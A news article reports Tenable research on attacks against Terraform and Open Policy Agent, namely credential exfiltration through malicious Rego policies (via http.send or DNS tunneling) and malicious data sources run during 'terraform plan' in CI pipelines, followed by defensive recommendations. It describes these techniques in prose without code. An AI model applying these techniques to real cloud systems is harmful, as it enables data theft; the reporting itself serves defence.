Cybersecurity

New Cybersecurity Threats Target IaC and PaC Tools in Cloud Platforms

By Business VerticalsPUBLISHED: November 29, 15:16UPDATED: November 29, 15:19
Cybersecurity vulnerabilities in Infrastructure-as-Code and Policy-as-Code tools expose cloud platforms to potential data breaches.

Cybersecurity experts have unveiled two novel attack techniques targeting Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools, such as HashiCorp's Terraform and Styra's Open Policy Agent (OPA). These vulnerabilities exploit dedicated domain-specific languages (DSLs) to breach cloud platforms and steal data.

According to Tenable senior security researcher Shelly Raban, "While these structured languages are designed to be more secure than traditional programming languages, they are not impervious." The technical report, released last week, emphasizes the need for vigilance despite the enhanced security measures these languages provide.

OPA, an open-source policy engine, allows organizations to enforce compliance across cloud-native environments, including microservices, CI/CD pipelines, and Kubernetes. Policies are created using a native query language known as Rego, which OPA evaluates to generate decisions.

Tenable's research indicates that the new attack method focuses on the supply chain. An attacker gains unauthorized access via a compromised access key, enabling them to insert a malicious Rego policy into an OPA server. This malicious policy can be used during the policy decision phase to perform harmful actions, like credential exfiltration, using the built-in "http.send" function.

Notably, even if OPA deployments restrict the use of the "http.send" function, attackers can still exploit the "net.lookup_ip_addr" function to conduct data exfiltration using DNS lookups in a technique known as DNS tunneling. Raban advises organizations to monitor and potentially restrict the use of this additional function to mitigate exfiltration risks.

Similarly, Terraform, which simplifies cloud resource management through code-based definitions, can also be exploited. Attackers could leverage the "terraform plan" command during GitHub "pull_request" workflows to execute unreviewed changes that include malicious data sources as part of the CI/CD process.

Tenable warns that since data sources are executed during the "terraform plan" phase, this significantly lowers the barrier for attackers. A malicious insider or external attacker with access to a public or private repository could manipulate a pull request for their own gains.

The potential attack vectors include rogue external data sources, malicious Terraform modules shared through public or private registries, or even DNS data sources. To safeguard against these threats, organizations should ensure they only use third-party components from trusted sources and implement additional security measures, including:

  • Enforcing granular role-based access control (RBAC) and adhering to the principle of least privilege.

  • Establishing application-level and cloud-level logging for thorough monitoring.

  • Limiting network and data access for applications and their underlying infrastructure.

  • Preventing the automatic execution of unreviewed and potentially harmful code within CI/CD pipelines.

Organizations can further bolster their defenses by employing IaC scanning tools, such as Terrascan and Checkov, to proactively identify misconfigurations and compliance issues before deploying changes to their environments.

Trending

Net Worth

Claudia Sheinbaum Net Worth: An Insight into Mexico's First Female President

Editor's Choice

Clara Jobs: The True Mother of Steve Jobs

Leadership

Todd McNabb: The Visionary Leader Transforming IT Operations with ScienceLogic

Editor's Choice

Top 10 Business Magazines to Read in 2024 | Essential Business Reading List

Banking & Finance

Which Investment Has the Least Liquidity? Understanding the Concept and Its Implications

Related

Recommended

Amazon Partners with Hinge Health
Health & Wellness

Amazon Partners with Hinge Health to Enhance Digital MSK Care Offerings and Expand Health Benefits Program

Julien Rio
Leadership

Julien Rio: A Trailblazer in Enhancing Customer Experience

Misty Severi
Leadership

Misty Severi: A Beacon of Ethical Journalism in a Changing Media Landscape

arnold schwarzenegger Net Worth
Net Worth

Arnold Schwarzenegger Net Worth: A Journey from Humble Beginnings to Billionaire Status

Ai Death Calculator
Artificial Intelligence

AI Death Calculator: Empowering Proactive Health Choices for a Longer Life

David goggins aleeza goggins
Editor's Choice

David Goggins’ Wife: Exploring His Relationships and Support System

Clara Jobs, Clara Hagopian
Editor's Choice

Clara Jobs: The True Mother of Steve Jobs

Parsons and Globalstar
IoT

Parsons and Globalstar demonstrate resilient connectivity